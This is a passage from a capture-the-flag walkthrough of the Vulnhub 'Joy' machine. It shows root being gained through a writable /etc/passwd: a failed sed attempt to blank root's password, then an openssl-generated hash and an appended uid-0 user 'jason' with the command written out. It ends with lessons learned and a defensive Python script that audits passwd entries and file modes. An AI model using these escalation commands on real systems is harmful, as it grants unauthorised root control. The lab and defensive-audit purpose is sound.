Since test only allows changing the permissions of files under the /script directory, that restriction had to be bypassed, which the ../ path above does.
With that we can modify /etc/passwd and remove root's password:
patrick@JOY:/tmp$ nano /etc/passwd
nano /etc/passwd
Error opening terminal: unknown.
patrick@JOY:/tmp$
But nano cannot be used here.
It seems the only option is to append content:
patrick@JOY:~$ sed -i '1c root::0:0:root:/root:/bin/bash' /etc/passwd
sed -i '1c root::0:0:root:/root:/bin/bash' /etc/passwd
sed: couldn't open temporary file /etc/sedu0TEOo: Permission denied
patrick@JOY:~$ which sed
which sed
/bin/sed
patrick@JOY:~$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
patrick@JOY:~$ echo 'test' >> /etc/passwd
echo 'test' >> /etc/passwd
patrick@JOY:~$
We can create a new user and give it root privileges:
┌──(kali㉿kali)-[~/Vulnhub/Joy]
└─$ openssl passwd -1 -salt jason 12345
$1$jason$qsg4ck0ojTQvTEpTDPg2C1
Append the user jason to /etc/passwd:
patrick@JOY:~$ echo 'jason:$1$jason$qsg4ck0ojTQvTEpTDPg2C1:0:0:root:/root:/bin/bash' >>/etc/passwd
<vTEpTDPg2C1:0:0:root:/root:/bin/bash' >>/etc/passwd
patrick@JOY:~$ su jason
su jason
Password: 12345
root@JOY:/home/patrick# cd /root
cd /root
root@JOY:~# ls -alh
ls -alh
total 104K
drwx------ 8 root root 4.0K Jan 28 2019 .
drwxr-xr-x 23 root root 4.0K Jan 6 2019 ..
---------- 1 root root 1.4K Jan 27 2019 author-secret.txt
-rw------- 1 root root 3.1K Jan 28 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K Jan 5 2019 .cache
drwxr-xr-x 5 root root 4.0K Jan 5 2019 .config
drwx------ 3 root root 4.0K Jan 5 2019 .dbus
-rw-r--r-- 1 root root 435 Jan 7 2019 document-generator.sh
-rw-r--r-- 1 root root 1.3K Jan 28 2019 dovecot.crt
-rw-r--r-- 1 root root 1.1K Jan 28 2019 dovecot.csr
-rw------- 1 root root 1.7K Jan 28 2019 dovecot.key
drwxr-xr-x 3 root root 4.0K Jan 5 2019 .local
-rw------- 1 root root 231 Dec 28 2018 .msmtprc
-rw------- 1 root root 36 Dec 28 2018 .mysql_history
drwxr-xr-x 2 root root 4.0K Dec 28 2018 .nano
-rw-r--r-- 1 root root 540 Jan 10 2019 permissions.sh
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
---------- 1 root root 71 Jan 10 2019 proof.txt
-rw------- 1 root root 1.0K Jan 28 2019 .rnd
-rw------- 1 root root 1.7K Jan 28 2019 rootCA.key
-rw-r--r-- 1 root root 1.5K Jan 28 2019 rootCA.pem
-rw-r--r-- 1 root root 17 Jan 28 2019 rootCA.srl
-rw-r--r-- 1 root root 66 Jan 6 2019 .selected_editor
drwx------ 2 root root 4.0K Jan 6 2019 .ssh
-rw-r--r-- 1 root root 209 Dec 28 2018 .wget-hsts
root@JOY:~# cat proof.txt
cat proof.txt
Never grant sudo permissions on scripts that perform system functions!
root@JOY:~#
The root flag was obtained successfully.
Lessons learned
- On this machine, the web service on port 80 yielded essentially no valuable information.
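The route to root here ran through a world-writable /etc/passwd and an appended uid-0 entry. The audit below is an added example, not part of the walkthrough: it parses passwd entries (a constructed sample that reproduces the stray `test` line and the jason entry appended above) and reports malformed lines, extra uid-0 accounts, hashes stored in passwd instead of shadow and duplicate uids, and separately checks a file mode for group- or world-write bits.

```python
import os
import stat

# Constructed /etc/passwd sample: a few ordinary entries, plus the stray
# "test" line and the uid-0 "jason" entry appended on this box.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
ftp:x:1001:1001::/home/ftp:/bin/false
test
jason:$1$jason$qsg4ck0ojTQvTEpTDPg2C1:0:0:root:/root:/bin/bash
"""

LOCKED = ("x", "*")  # hash lives in /etc/shadow, or the account is locked

def audit_passwd(text: str) -> list:
    """Return (line_no, finding, detail) tuples for suspicious entries."""
    findings, owner_of_uid = [], {}
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, "malformed entry", line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((line_no, "non-numeric uid", name))
            continue
        uid = int(uid)
        if uid == 0 and name != "root":
            findings.append((line_no, "extra uid-0 account", name))
        if pw == "":
            findings.append((line_no, "empty password field", name))
        elif pw not in LOCKED and not pw.startswith("!"):
            findings.append((line_no, "hash stored in passwd, not shadow", name))
        if uid in owner_of_uid:
            findings.append((line_no, "duplicate uid",
                             f"{name} shares uid {uid} with {owner_of_uid[uid]}"))
        else:
            owner_of_uid[uid] = name
    return findings

def check_mode(st_mode: int) -> list:
    """Flag write bits that let non-root users edit the file (here: 777)."""
    findings = []
    if st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    return findings

def audit_file(path: str = "/etc/passwd") -> list:
    """Run both checks against a real file on the host."""
    with open(path) as fh:
        findings = audit_passwd(fh.read())
    for f in check_mode(os.stat(path).st_mode):
        findings.append((0, "file mode", f))
    return findings
```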